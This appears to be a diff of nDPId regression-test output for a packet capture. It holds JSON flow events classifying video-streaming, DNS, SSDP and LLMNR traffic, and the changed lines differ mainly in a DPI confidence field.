{"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380188,"flow_last_seen":1470104380188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380188,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1470104380188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1470104380188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1470104380300,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380300,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0c30AAHAGQPfa9IeqwKhzCCOLwccogsRifLctf4ASQAAcSgAAAgQFtAEDAwABAQQC"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1470104380603,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104380603,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLUAAAQRv8HAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1470104380737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1470104380737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1470104380772,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1470104380772,"pkt":"ABxCjnAxTF4M6gNlCABFAABmlL4AAC4RtAgICAgIwKhzCAA11JQAUqbTpTiBgAABAAIAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQABwAwABQABAAABKwANCnByb3h5LXNldDHAD8AtAAEAAQAAASsABMvNl+o="} -00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1470104380772,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.151.234"}} +00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1470104380772,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.151.234"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380773,"flow_last_seen":1470104380773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380773,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1470104380773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1470104380773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1470104380801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380801,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADMGsFvLzZfqwKhzCABQwcglYwNrH2Z22IASFoBABAAAAgQFoAEBBAIBAwMK"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380890,"flow_last_seen":1470104380890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380890,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1470104380890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1470104380890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380909,"flow_last_seen":1470104380909,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104380909,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1470104380909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104380909,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1470104380966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1470104380966,"pkt":"ABxCjnAxTF4M6gNlCABFAAAwAABAADAGuQcqeDOYwKhzCB+QwcnDIL+ais5pCHASFtCCkgAAAgQFtAEBBAI="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1470104381115,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381115,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEIAAAER2QjAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104381217,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U68AAAERvz7AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381217,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFE8AAAER7zXAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 